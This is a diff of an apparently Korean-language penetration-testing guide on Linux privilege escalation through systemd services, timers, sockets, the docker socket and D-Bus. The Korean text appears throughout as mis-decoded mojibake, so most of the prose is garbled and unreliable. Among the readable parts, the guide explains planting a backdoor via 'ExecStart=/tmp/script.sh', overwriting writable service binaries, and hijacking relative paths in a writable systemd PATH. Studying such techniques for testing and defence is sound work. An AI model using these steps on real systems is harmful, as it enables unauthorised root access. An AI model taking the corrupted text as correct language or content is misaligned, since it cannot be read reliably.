ํ™•์ธํ•˜์„ธ์š”. ์“ธ ์ˆ˜ ์žˆ๋‹ค๋ฉด, ์„œ๋น„์Šค๊ฐ€ **์‹œ์ž‘**, **์žฌ์‹œ์ž‘** ๋˜๋Š” **์ค‘์ง€**๋  ๋•Œ **๋ฐฑ๋„์–ด๋ฅผ ์‹คํ–‰ํ•˜๋„๋ก** **์ˆ˜์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค** (๊ธฐ๊ณ„๊ฐ€ ์žฌ๋ถ€ํŒ…๋  ๋•Œ๊นŒ์ง€ ๊ธฐ๋‹ค๋ ค์•ผ ํ•  ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค).\ +์˜ˆ๋ฅผ ๋“ค์–ด, `.service` ํŒŒ์ผ ์•ˆ์— **`ExecStart=/tmp/script.sh`**๋กœ ๋ฐฑ๋„์–ด๋ฅผ ์ƒ์„ฑํ•˜์„ธ์š”. -### Writable service binaries +### ์“ฐ๊ธฐ ๊ฐ€๋Šฅํ•œ ์„œ๋น„์Šค ๋ฐ”์ด๋„ˆ๋ฆฌ ์„œ๋น„์Šค์— ์˜ํ•ด ์‹คํ–‰๋˜๋Š” ๋ฐ”์ด๋„ˆ๋ฆฌ์— **์“ฐ๊ธฐ ๊ถŒํ•œ**์ด ์žˆ๋Š” ๊ฒฝ์šฐ, ์ด๋ฅผ ๋ฐฑ๋„์–ด๋กœ ๋ณ€๊ฒฝํ•  ์ˆ˜ ์žˆ์œผ๋ฏ€๋กœ ์„œ๋น„์Šค๊ฐ€ ๋‹ค์‹œ ์‹คํ–‰๋  ๋•Œ ๋ฐฑ๋„์–ด๊ฐ€ ์‹คํ–‰๋ฉ๋‹ˆ๋‹ค. -### systemd PATH - Relative Paths +### systemd PATH - ์ƒ๋Œ€ ๊ฒฝ๋กœ **systemd**์—์„œ ์‚ฌ์šฉ๋˜๋Š” PATH๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: ```bash systemctl show-environment ``` -๊ฒฝ๋กœ์˜ ํด๋” ์ค‘์—์„œ **์“ฐ๊ธฐ**๊ฐ€ ๊ฐ€๋Šฅํ•˜๋‹ค๊ณ  ํŒ๋‹จ๋˜๋ฉด **๊ถŒํ•œ ์ƒ์Šน**์ด ๊ฐ€๋Šฅํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋‹ค์Œ๊ณผ ๊ฐ™์€ ์„œ๋น„์Šค ๊ตฌ์„ฑ ํŒŒ์ผ์—์„œ **์‚ฌ์šฉ๋˜๋Š” ์ƒ๋Œ€ ๊ฒฝ๋กœ**๋ฅผ ๊ฒ€์ƒ‰ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค: +๊ฒฝ๋กœ์˜ ํด๋” ์ค‘์—์„œ **์“ฐ๊ธฐ**๊ฐ€ ๊ฐ€๋Šฅํ•˜๋‹ค๊ณ  ํŒ๋‹จ๋˜๋ฉด **๊ถŒํ•œ ์ƒ์Šน**์ด ๊ฐ€๋Šฅํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋‹ค์Œ๊ณผ ๊ฐ™์€ ์„œ๋น„์Šค ๊ตฌ์„ฑ ํŒŒ์ผ์—์„œ **์ƒ๋Œ€ ๊ฒฝ๋กœ**๊ฐ€ ์‚ฌ์šฉ๋˜๊ณ  ์žˆ๋Š”์ง€ ๊ฒ€์ƒ‰ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค: ```bash ExecStart=faraday-server ExecStart=/bin/sh -ec 'ifup --allow=hotplug %I; ifquery --state %I' ExecStop=/bin/sh "uptux-vuln-bin3 -stuff -hello" ``` -๊ทธ๋Ÿฐ ๋‹ค์Œ, ์“ธ ์ˆ˜ ์žˆ๋Š” systemd PATH ํด๋” ๋‚ด์— **์ƒ๋Œ€ ๊ฒฝ๋กœ ์ด์ง„ ํŒŒ์ผ**๊ณผ **๊ฐ™์€ ์ด๋ฆ„**์˜ **์‹คํ–‰ ํŒŒ์ผ**์„ ์ƒ์„ฑํ•˜๊ณ , ์„œ๋น„์Šค๊ฐ€ ์ทจ์•ฝํ•œ ์ž‘์—…(**์‹œ์ž‘**, **์ค‘์ง€**, **๋‹ค์‹œ ๋กœ๋“œ**)์„ ์‹คํ–‰ํ•˜๋ผ๊ณ  ์š”์ฒญ๋ฐ›์„ ๋•Œ, ๋‹น์‹ ์˜ **๋ฐฑ๋„์–ด๊ฐ€ ์‹คํ–‰๋  ๊ฒƒ์ž…๋‹ˆ๋‹ค** (๋น„ํŠน๊ถŒ ์‚ฌ์šฉ์ž๋Š” ์ผ๋ฐ˜์ ์œผ๋กœ ์„œ๋น„์Šค๋ฅผ ์‹œ์ž‘/์ค‘์ง€ํ•  ์ˆ˜ ์—†์ง€๋งŒ `sudo -l`์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋Š”์ง€ ํ™•์ธํ•˜์‹ญ์‹œ์˜ค). +๊ทธ๋Ÿฐ ๋‹ค์Œ, ์“ธ ์ˆ˜ ์žˆ๋Š” systemd PATH ํด๋” ๋‚ด์— **์ƒ๋Œ€ ๊ฒฝ๋กœ ์ด์ง„ ํŒŒ์ผ**๊ณผ **๊ฐ™์€ ์ด๋ฆ„**์˜ **์‹คํ–‰ ํŒŒ์ผ**์„ ์ƒ์„ฑํ•˜๊ณ , ์„œ๋น„์Šค๊ฐ€ ์ทจ์•ฝํ•œ ์ž‘์—…(**์‹œ์ž‘**, **์ค‘์ง€**, **๋‹ค์‹œ ๋กœ๋“œ**)์„ ์‹คํ–‰ํ•˜๋„๋ก ์š”์ฒญ๋ฐ›์„ ๋•Œ, ๋‹น์‹ ์˜ **๋ฐฑ๋„์–ด๊ฐ€ ์‹คํ–‰๋  ๊ฒƒ์ž…๋‹ˆ๋‹ค** (๋น„ํŠน๊ถŒ ์‚ฌ์šฉ์ž๋Š” ์ผ๋ฐ˜์ ์œผ๋กœ ์„œ๋น„์Šค๋ฅผ ์‹œ์ž‘/์ค‘์ง€ํ•  ์ˆ˜ ์—†์ง€๋งŒ `sudo -l`์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋Š”์ง€ ํ™•์ธํ•˜์‹ญ์‹œ์˜ค). -**`man systemd.service`๋ฅผ ํ†ตํ•ด ์„œ๋น„์Šค์— ๋Œ€ํ•ด ๋” ์•Œ์•„๋ณด์‹ญ์‹œ์˜ค.** +**์„œ๋น„์Šค์— ๋Œ€ํ•œ ์ž์„ธํ•œ ๋‚ด์šฉ์€ `man systemd.service`๋ฅผ ์ฐธ์กฐํ•˜์‹ญ์‹œ์˜ค.** ## **ํƒ€์ด๋จธ** -**ํƒ€์ด๋จธ**๋Š” `**.service**` ํŒŒ์ผ์ด๋‚˜ ์ด๋ฒคํŠธ๋ฅผ ์ œ์–ดํ•˜๋Š” `**.timer**`๋กœ ๋๋‚˜๋Š” systemd ์œ ๋‹› ํŒŒ์ผ์ž…๋‹ˆ๋‹ค. **ํƒ€์ด๋จธ**๋Š” ์บ˜๋ฆฐ๋” ์‹œ๊ฐ„ ์ด๋ฒคํŠธ์™€ ๋‹จ์กฐ ์‹œ๊ฐ„ ์ด๋ฒคํŠธ์— ๋Œ€ํ•œ ๊ธฐ๋ณธ ์ง€์›์ด ์žˆ์–ด ๋น„๋™๊ธฐ์ ์œผ๋กœ ์‹คํ–‰๋  ์ˆ˜ ์žˆ์œผ๋ฏ€๋กœ cron์˜ ๋Œ€์•ˆ์œผ๋กœ ์‚ฌ์šฉ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +**ํƒ€์ด๋จธ**๋Š” `**.service**` ํŒŒ์ผ ๋˜๋Š” ์ด๋ฒคํŠธ๋ฅผ ์ œ์–ดํ•˜๋Š” `**.timer**`๋กœ ๋๋‚˜๋Š” systemd ์œ ๋‹› ํŒŒ์ผ์ž…๋‹ˆ๋‹ค. **ํƒ€์ด๋จธ**๋Š” ์บ˜๋ฆฐ๋” ์‹œ๊ฐ„ ์ด๋ฒคํŠธ์™€ ๋‹จ์กฐ ์‹œ๊ฐ„ ์ด๋ฒคํŠธ์— ๋Œ€ํ•œ ๊ธฐ๋ณธ ์ง€์›์ด ์žˆ์–ด ๋น„๋™๊ธฐ์ ์œผ๋กœ ์‹คํ–‰๋  ์ˆ˜ ์žˆ์œผ๋ฏ€๋กœ cron์˜ ๋Œ€์•ˆ์œผ๋กœ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -๋ชจ๋“  ํƒ€์ด๋จธ๋ฅผ ๋‚˜์—ดํ•˜๋ ค๋ฉด: +๋ชจ๋“  ํƒ€์ด๋จธ๋ฅผ ๋‚˜์—ดํ•˜๋ ค๋ฉด ๋‹ค์Œ์„ ์‚ฌ์šฉํ•˜์‹ญ์‹œ์˜ค: ```bash systemctl list-timers --all ``` @@ -423,8 +423,8 @@ Unit=backdoor.service ๋”ฐ๋ผ์„œ ์ด ๊ถŒํ•œ์„ ์•…์šฉํ•˜๋ ค๋ฉด ๋‹ค์Œ์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค: -- **์“ฐ๊ธฐ ๊ฐ€๋Šฅํ•œ ๋ฐ”์ด๋„ˆ๋ฆฌ**๋ฅผ **์‹คํ–‰ํ•˜๋Š”** ์ผ๋ถ€ systemd ์œ ๋‹›(์˜ˆ: `.service`) ์ฐพ๊ธฐ -- **์ƒ๋Œ€ ๊ฒฝ๋กœ**๋ฅผ **์‹คํ–‰ํ•˜๋Š”** ์ผ๋ถ€ systemd ์œ ๋‹›์„ ์ฐพ๊ณ , **systemd PATH**์— ๋Œ€ํ•ด **์“ฐ๊ธฐ ๊ถŒํ•œ**์ด ์žˆ์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค(ํ•ด๋‹น ์‹คํ–‰ ํŒŒ์ผ์„ ๊ฐ€์žฅํ•˜๊ธฐ ์œ„ํ•ด) +- **์“ฐ๊ธฐ ๊ฐ€๋Šฅํ•œ ๋ฐ”์ด๋„ˆ๋ฆฌ**๋ฅผ **์‹คํ–‰ํ•˜๋Š”** ์ผ๋ถ€ systemd ์œ ๋‹›(์˜ˆ: `.service`)์„ ์ฐพ์Šต๋‹ˆ๋‹ค. +- **์ƒ๋Œ€ ๊ฒฝ๋กœ**๋ฅผ **์‹คํ–‰ํ•˜๋Š”** ์ผ๋ถ€ systemd ์œ ๋‹›์„ ์ฐพ๊ณ , **systemd PATH**์— ๋Œ€ํ•ด **์“ฐ๊ธฐ ๊ถŒํ•œ**์ด ์žˆ์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค(ํ•ด๋‹น ์‹คํ–‰ ํŒŒ์ผ์„ ๊ฐ€์žฅํ•˜๊ธฐ ์œ„ํ•ด). **ํƒ€์ด๋จธ์— ๋Œ€ํ•ด ๋” ์•Œ์•„๋ณด๋ ค๋ฉด `man systemd.timer`๋ฅผ ์ฐธ์กฐํ•˜์„ธ์š”.** @@ -446,9 +446,9 @@ Unix Domain Sockets (UDS)๋Š” ํด๋ผ์ด์–ธํŠธ-์„œ๋ฒ„ ๋ชจ๋ธ ๋‚ด์—์„œ ๋™์ผํ•˜ **์†Œ์ผ“์— ๋Œ€ํ•ด ๋” ์•Œ์•„๋ณด๋ ค๋ฉด `man systemd.socket`๋ฅผ ์ฐธ์กฐํ•˜์„ธ์š”.** ์ด ํŒŒ์ผ ๋‚ด์—์„œ ์—ฌ๋Ÿฌ ํฅ๋ฏธ๋กœ์šด ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ๊ตฌ์„ฑํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: - `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: ์ด ์˜ต์…˜๋“ค์€ ๋‹ค๋ฅด์ง€๋งŒ, **์†Œ์ผ“์ด ์–ด๋””์—์„œ ์ˆ˜์‹  ๋Œ€๊ธฐํ• ์ง€๋ฅผ ๋‚˜ํƒ€๋‚ด๊ธฐ ์œ„ํ•ด ์š”์•ฝ๋ฉ๋‹ˆ๋‹ค** (AF_UNIX ์†Œ์ผ“ ํŒŒ์ผ์˜ ๊ฒฝ๋กœ, ์ˆ˜์‹  ๋Œ€๊ธฐํ•  IPv4/6 ๋ฐ/๋˜๋Š” ํฌํŠธ ๋ฒˆํ˜ธ ๋“ฑ) -- `Accept`: ๋ถ€์šธ ์ธ์ˆ˜๋ฅผ ๋ฐ›์Šต๋‹ˆ๋‹ค. **true**์ธ ๊ฒฝ์šฐ, **๊ฐ ์ˆ˜์‹  ์—ฐ๊ฒฐ์— ๋Œ€ํ•ด ์„œ๋น„์Šค ์ธ์Šคํ„ด์Šค๊ฐ€ ์ƒ์„ฑ**๋˜๋ฉฐ, ์—ฐ๊ฒฐ ์†Œ์ผ“๋งŒ ์ „๋‹ฌ๋ฉ๋‹ˆ๋‹ค. **false**์ธ ๊ฒฝ์šฐ, ๋ชจ๋“  ์ˆ˜์‹  ์†Œ์ผ“ ์ž์ฒด๊ฐ€ **์‹œ์ž‘๋œ ์„œ๋น„์Šค ์œ ๋‹›์— ์ „๋‹ฌ**๋˜๋ฉฐ, ๋ชจ๋“  ์—ฐ๊ฒฐ์— ๋Œ€ํ•ด ๋‹จ ํ•˜๋‚˜์˜ ์„œ๋น„์Šค ์œ ๋‹›์ด ์ƒ์„ฑ๋ฉ๋‹ˆ๋‹ค. ์ด ๊ฐ’์€ ๋‹จ์ผ ์„œ๋น„์Šค ์œ ๋‹›์ด ๋ชจ๋“  ์ˆ˜์‹  ํŠธ๋ž˜ํ”ฝ์„ ๋ฌด์กฐ๊ฑด ์ฒ˜๋ฆฌํ•˜๋Š” ๋ฐ์ดํ„ฐ๊ทธ๋žจ ์†Œ์ผ“ ๋ฐ FIFO์— ๋Œ€ํ•ด ๋ฌด์‹œ๋ฉ๋‹ˆ๋‹ค. **๊ธฐ๋ณธ๊ฐ’์€ false**์ž…๋‹ˆ๋‹ค. ์„ฑ๋Šฅ์ƒ์˜ ์ด์œ ๋กœ, ์ƒˆ๋กœ์šด ๋ฐ๋ชฌ์€ `Accept=no`์— ์ ํ•ฉํ•œ ๋ฐฉ์‹์œผ๋กœ๋งŒ ์ž‘์„ฑํ•˜๋Š” ๊ฒƒ์ด ๊ถŒ์žฅ๋ฉ๋‹ˆ๋‹ค. -- `ExecStartPre`, `ExecStartPost`: ์ˆ˜์‹  ๋Œ€๊ธฐํ•˜๋Š” **์†Œ์ผ“**/FIFO๊ฐ€ **์ƒ์„ฑ**๋˜๊ณ  ๋ฐ”์ธ๋”ฉ๋˜๊ธฐ **์ „** ๋˜๋Š” **ํ›„**์— **์‹คํ–‰๋˜๋Š”** ํ•˜๋‚˜ ์ด์ƒ์˜ ๋ช…๋ น์ค„์„ ๋ฐ›์Šต๋‹ˆ๋‹ค. ๋ช…๋ น์ค„์˜ ์ฒซ ๋ฒˆ์งธ ํ† ํฐ์€ ์ ˆ๋Œ€ ํŒŒ์ผ ์ด๋ฆ„์ด์–ด์•ผ ํ•˜๋ฉฐ, ๊ทธ ๋‹ค์Œ์— ํ”„๋กœ์„ธ์Šค์— ๋Œ€ํ•œ ์ธ์ˆ˜๊ฐ€ ์˜ต๋‹ˆ๋‹ค. -- `ExecStopPre`, `ExecStopPost`: ์ˆ˜์‹  ๋Œ€๊ธฐํ•˜๋Š” **์†Œ์ผ“**/FIFO๊ฐ€ **๋‹ซํžˆ๊ณ ** ์ œ๊ฑฐ๋˜๊ธฐ **์ „** ๋˜๋Š” **ํ›„**์— **์‹คํ–‰๋˜๋Š”** ์ถ”๊ฐ€ **๋ช…๋ น**์ž…๋‹ˆ๋‹ค. +- `Accept`: ๋ถ€์šธ ์ธ์ˆ˜๋ฅผ ๋ฐ›์Šต๋‹ˆ๋‹ค. **true**์ธ ๊ฒฝ์šฐ, **๊ฐ ์ˆ˜์‹  ์—ฐ๊ฒฐ์— ๋Œ€ํ•ด ์„œ๋น„์Šค ์ธ์Šคํ„ด์Šค๊ฐ€ ์ƒ์„ฑ**๋˜๋ฉฐ, ์—ฐ๊ฒฐ ์†Œ์ผ“๋งŒ ์ „๋‹ฌ๋ฉ๋‹ˆ๋‹ค. **false**์ธ ๊ฒฝ์šฐ, ๋ชจ๋“  ์ˆ˜์‹  ๋Œ€๊ธฐ ์†Œ์ผ“ ์ž์ฒด๊ฐ€ **์‹œ์ž‘๋œ ์„œ๋น„์Šค ์œ ๋‹›์— ์ „๋‹ฌ**๋˜๋ฉฐ, ๋ชจ๋“  ์—ฐ๊ฒฐ์— ๋Œ€ํ•ด ๋‹จ ํ•˜๋‚˜์˜ ์„œ๋น„์Šค ์œ ๋‹›์ด ์ƒ์„ฑ๋ฉ๋‹ˆ๋‹ค. ์ด ๊ฐ’์€ ๋‹จ์ผ ์„œ๋น„์Šค ์œ ๋‹›์ด ๋ชจ๋“  ์ˆ˜์‹  ํŠธ๋ž˜ํ”ฝ์„ ๋ฌด์กฐ๊ฑด ์ฒ˜๋ฆฌํ•˜๋Š” ๋ฐ์ดํ„ฐ๊ทธ๋žจ ์†Œ์ผ“ ๋ฐ FIFO์— ๋Œ€ํ•ด ๋ฌด์‹œ๋ฉ๋‹ˆ๋‹ค. **๊ธฐ๋ณธ๊ฐ’์€ false**์ž…๋‹ˆ๋‹ค. ์„ฑ๋Šฅ์ƒ์˜ ์ด์œ ๋กœ, ์ƒˆ๋กœ์šด ๋ฐ๋ชฌ์€ `Accept=no`์— ์ ํ•ฉํ•œ ๋ฐฉ์‹์œผ๋กœ๋งŒ ์ž‘์„ฑํ•˜๋Š” ๊ฒƒ์ด ๊ถŒ์žฅ๋ฉ๋‹ˆ๋‹ค. +- `ExecStartPre`, `ExecStartPost`: ์ˆ˜์‹  ๋Œ€๊ธฐ **์†Œ์ผ“**/FIFO๊ฐ€ **์ƒ์„ฑ**๋˜๊ณ  ๋ฐ”์ธ๋”ฉ๋˜๊ธฐ **์ „** ๋˜๋Š” **ํ›„**์— **์‹คํ–‰๋˜๋Š”** ํ•˜๋‚˜ ์ด์ƒ์˜ ๋ช…๋ น์ค„์„ ๋ฐ›์Šต๋‹ˆ๋‹ค. ๋ช…๋ น์ค„์˜ ์ฒซ ๋ฒˆ์งธ ํ† ํฐ์€ ์ ˆ๋Œ€ ํŒŒ์ผ ์ด๋ฆ„์ด์–ด์•ผ ํ•˜๋ฉฐ, ๊ทธ ๋‹ค์Œ์— ํ”„๋กœ์„ธ์Šค์— ๋Œ€ํ•œ ์ธ์ˆ˜๊ฐ€ ์˜ต๋‹ˆ๋‹ค. +- `ExecStopPre`, `ExecStopPost`: ์ˆ˜์‹  ๋Œ€๊ธฐ **์†Œ์ผ“**/FIFO๊ฐ€ **๋‹ซํžˆ๊ณ ** ์ œ๊ฑฐ๋˜๊ธฐ **์ „** ๋˜๋Š” **ํ›„**์— **์‹คํ–‰๋˜๋Š”** ์ถ”๊ฐ€ **๋ช…๋ น**์ž…๋‹ˆ๋‹ค. - `Service`: **์ˆ˜์‹  ํŠธ๋ž˜ํ”ฝ**์— ๋Œ€ํ•ด **ํ™œ์„ฑํ™”ํ• ** **์„œ๋น„์Šค** ์œ ๋‹› ์ด๋ฆ„์„ ์ง€์ •ํ•ฉ๋‹ˆ๋‹ค. ์ด ์„ค์ •์€ Accept=no์ธ ์†Œ์ผ“์— ๋Œ€ํ•ด์„œ๋งŒ ํ—ˆ์šฉ๋ฉ๋‹ˆ๋‹ค. ๊ธฐ๋ณธ๊ฐ’์€ ์†Œ์ผ“๊ณผ ๋™์ผํ•œ ์ด๋ฆ„์„ ๊ฐ€์ง„ ์„œ๋น„์Šค์ž…๋‹ˆ๋‹ค (์ ‘๋ฏธ์‚ฌ๊ฐ€ ๋Œ€์ฒด๋จ). ๋Œ€๋ถ€๋ถ„์˜ ๊ฒฝ์šฐ, ์ด ์˜ต์…˜์„ ์‚ฌ์šฉํ•  ํ•„์š”๋Š” ์—†์Šต๋‹ˆ๋‹ค. ### Writable .socket files @@ -536,9 +536,9 @@ Upgrade: tcp ### ๊ธฐํƒ€ -**docker** ๊ทธ๋ฃน์— **์†ํ•ด ์žˆ๊ธฐ ๋•Œ๋ฌธ์—** docker ์†Œ์ผ“์— ๋Œ€ํ•œ ์“ฐ๊ธฐ ๊ถŒํ•œ์ด ์žˆ๋Š” ๊ฒฝ์šฐ [**๊ถŒํ•œ ์ƒ์Šน์„ ์œ„ํ•œ ๋” ๋งŽ์€ ๋ฐฉ๋ฒ•**](interesting-groups-linux-pe/index.html#docker-group)์ด ์žˆ์Šต๋‹ˆ๋‹ค. [**docker API๊ฐ€ ํฌํŠธ์—์„œ ์ˆ˜์‹  ๋Œ€๊ธฐ ์ค‘์ธ ๊ฒฝ์šฐ** ์ด๋ฅผ ์†์ƒ์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค](../../network-services-pentesting/2375-pentesting-docker.md#compromising). +**docker** ๊ทธ๋ฃน์— **์†ํ•ด ์žˆ๊ธฐ ๋•Œ๋ฌธ์—** docker ์†Œ์ผ“์— ๋Œ€ํ•œ ์“ฐ๊ธฐ ๊ถŒํ•œ์ด ์žˆ๋Š” ๊ฒฝ์šฐ [**๊ถŒํ•œ ์ƒ์Šน์„ ์œ„ํ•œ ๋” ๋งŽ์€ ๋ฐฉ๋ฒ•**](interesting-groups-linux-pe/index.html#docker-group)์ด ์žˆ์Šต๋‹ˆ๋‹ค. [**docker API๊ฐ€ ํฌํŠธ์—์„œ ์ˆ˜์‹  ๋Œ€๊ธฐ ์ค‘์ด๋ผ๋ฉด ์ด๋ฅผ ํƒ€๊ฒฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**](../../network-services-pentesting/2375-pentesting-docker.md#compromising). -๋‹ค์Œ์—์„œ **docker์—์„œ ํƒˆ์ถœํ•˜๊ฑฐ๋‚˜ ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ค๊ธฐ ์œ„ํ•ด ์•…์šฉํ•  ์ˆ˜ ์žˆ๋Š” ๋” ๋งŽ์€ ๋ฐฉ๋ฒ•**์„ ํ™•์ธํ•˜์„ธ์š”: +๋‹ค์Œ์—์„œ **docker์—์„œ ํƒˆ์ถœํ•˜๊ฑฐ๋‚˜ ๊ถŒํ•œ ์ƒ์Šน์„ ์œ„ํ•ด ์•…์šฉํ•  ์ˆ˜ ์žˆ๋Š” ๋” ๋งŽ์€ ๋ฐฉ๋ฒ•**์„ ํ™•์ธํ•˜์„ธ์š”: {{#ref}} docker-security/ @@ -562,13 +562,13 @@ runc-privilege-escalation.md ## **D-Bus** -D-Bus๋Š” ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์ด ํšจ์œจ์ ์œผ๋กœ ์ƒํ˜ธ ์ž‘์šฉํ•˜๊ณ  ๋ฐ์ดํ„ฐ๋ฅผ ๊ณต์œ ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ฃผ๋Š” ์ •๊ตํ•œ **ํ”„๋กœ์„ธ์Šค ๊ฐ„ ํ†ต์‹ (IPC) ์‹œ์Šคํ…œ**์ž…๋‹ˆ๋‹ค. ํ˜„๋Œ€ Linux ์‹œ์Šคํ…œ์„ ์—ผ๋‘์— ๋‘๊ณ  ์„ค๊ณ„๋œ D-Bus๋Š” ๋‹ค์–‘ํ•œ ํ˜•ํƒœ์˜ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜ ํ†ต์‹ ์„ ์œ„ํ•œ ๊ฐ•๋ ฅํ•œ ํ”„๋ ˆ์ž„์›Œํฌ๋ฅผ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. +D-Bus๋Š” ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์ด ํšจ์œจ์ ์œผ๋กœ ์ƒํ˜ธ์ž‘์šฉํ•˜๊ณ  ๋ฐ์ดํ„ฐ๋ฅผ ๊ณต์œ ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ฃผ๋Š” ์ •๊ตํ•œ **ํ”„๋กœ์„ธ์Šค ๊ฐ„ ํ†ต์‹ (IPC) ์‹œ์Šคํ…œ**์ž…๋‹ˆ๋‹ค. ํ˜„๋Œ€ Linux ์‹œ์Šคํ…œ์„ ์—ผ๋‘์— ๋‘๊ณ  ์„ค๊ณ„๋˜์–ด ๋‹ค์–‘ํ•œ ํ˜•ํƒœ์˜ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜ ํ†ต์‹ ์„ ์œ„ํ•œ ๊ฐ•๋ ฅํ•œ ํ”„๋ ˆ์ž„์›Œํฌ๋ฅผ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. ์ด ์‹œ์Šคํ…œ์€ ๊ธฐ๋ณธ IPC๋ฅผ ์ง€์›ํ•˜์—ฌ ํ”„๋กœ์„ธ์Šค ๊ฐ„ ๋ฐ์ดํ„ฐ ๊ตํ™˜์„ ํ–ฅ์ƒ์‹œํ‚ค๋ฉฐ, **ํ–ฅ์ƒ๋œ UNIX ๋„๋ฉ”์ธ ์†Œ์ผ“**์„ ์—ฐ์ƒ์‹œํ‚ต๋‹ˆ๋‹ค. ๋˜ํ•œ ์ด๋ฒคํŠธ๋‚˜ ์‹ ํ˜ธ๋ฅผ ๋ฐฉ์†กํ•˜๋Š” ๋ฐ ๋„์›€์„ ์ฃผ์–ด ์‹œ์Šคํ…œ ๊ตฌ์„ฑ ์š”์†Œ ๊ฐ„์˜ ์›ํ™œํ•œ ํ†ตํ•ฉ์„ ์ด‰์ง„ํ•ฉ๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด, Bluetooth ๋ฐ๋ชฌ์—์„œ ์ˆ˜์‹  ์ „ํ™”์— ๋Œ€ํ•œ ์‹ ํ˜ธ๊ฐ€ ์Œ์•… ํ”Œ๋ ˆ์ด์–ด๋ฅผ ์Œ์†Œ๊ฑฐํ•˜๋„๋ก ํ•  ์ˆ˜ ์žˆ์–ด ์‚ฌ์šฉ์ž ๊ฒฝํ—˜์„ ํ–ฅ์ƒ์‹œํ‚ต๋‹ˆ๋‹ค. ์ถ”๊ฐ€๋กœ, D-Bus๋Š” ์›๊ฒฉ ๊ฐ์ฒด ์‹œ์Šคํ…œ์„ ์ง€์›ํ•˜์—ฌ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜ ๊ฐ„์˜ ์„œ๋น„์Šค ์š”์ฒญ ๋ฐ ๋ฉ”์„œ๋“œ ํ˜ธ์ถœ์„ ๊ฐ„์†Œํ™”ํ•˜์—ฌ ์ „ํ†ต์ ์œผ๋กœ ๋ณต์žกํ–ˆ๋˜ ํ”„๋กœ์„ธ์Šค๋ฅผ ๊ฐ„์†Œํ™”ํ•ฉ๋‹ˆ๋‹ค. -D-Bus๋Š” **ํ—ˆ์šฉ/๊ฑฐ๋ถ€ ๋ชจ๋ธ**์— ๋”ฐ๋ผ ์ž‘๋™ํ•˜๋ฉฐ, ๋ฉ”์‹œ์ง€ ๊ถŒํ•œ(๋ฉ”์„œ๋“œ ํ˜ธ์ถœ, ์‹ ํ˜ธ ์ „์†ก ๋“ฑ)์„ ๋ˆ„์  ํšจ๊ณผ์— ๋”ฐ๋ผ ๊ด€๋ฆฌํ•ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ์ •์ฑ…์€ ๋ฒ„์Šค์™€์˜ ์ƒํ˜ธ ์ž‘์šฉ์„ ์ง€์ •ํ•˜๋ฉฐ, ์ด๋Ÿฌํ•œ ๊ถŒํ•œ์„ ์•…์šฉํ•˜์—ฌ ๊ถŒํ•œ ์ƒ์Šน์„ ํ—ˆ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +D-Bus๋Š” **ํ—ˆ์šฉ/๊ฑฐ๋ถ€ ๋ชจ๋ธ**์— ๋”ฐ๋ผ ์ž‘๋™ํ•˜๋ฉฐ, ๋ฉ”์‹œ์ง€ ๊ถŒํ•œ(๋ฉ”์„œ๋“œ ํ˜ธ์ถœ, ์‹ ํ˜ธ ์ „์†ก ๋“ฑ)์„ ๋ˆ„์  ํšจ๊ณผ์— ๋”ฐ๋ผ ๊ด€๋ฆฌํ•ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ์ •์ฑ…์€ ๋ฒ„์Šค์™€์˜ ์ƒํ˜ธ์ž‘์šฉ์„ ์ง€์ •ํ•˜๋ฉฐ, ์ด๋Ÿฌํ•œ ๊ถŒํ•œ์„ ์•…์šฉํ•˜์—ฌ ๊ถŒํ•œ ์ƒ์Šน์„ ํ—ˆ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -`/etc/dbus-1/system.d/wpa_supplicant.conf`์— ์ œ๊ณต๋œ ์ •์ฑ…์˜ ์˜ˆ๋Š” root ์‚ฌ์šฉ์ž๊ฐ€ `fi.w1.wpa_supplicant1`์œผ๋กœ๋ถ€ํ„ฐ ๋ฉ”์‹œ์ง€๋ฅผ ์†Œ์œ ํ•˜๊ณ , ์ „์†กํ•˜๊ณ , ์ˆ˜์‹ ํ•  ์ˆ˜ ์žˆ๋Š” ๊ถŒํ•œ์„ ์ž์„ธํžˆ ์„ค๋ช…ํ•ฉ๋‹ˆ๋‹ค. +`/etc/dbus-1/system.d/wpa_supplicant.conf`์— ์žˆ๋Š” ์ •์ฑ…์˜ ์˜ˆ๋Š” root ์‚ฌ์šฉ์ž๊ฐ€ `fi.w1.wpa_supplicant1`์—์„œ 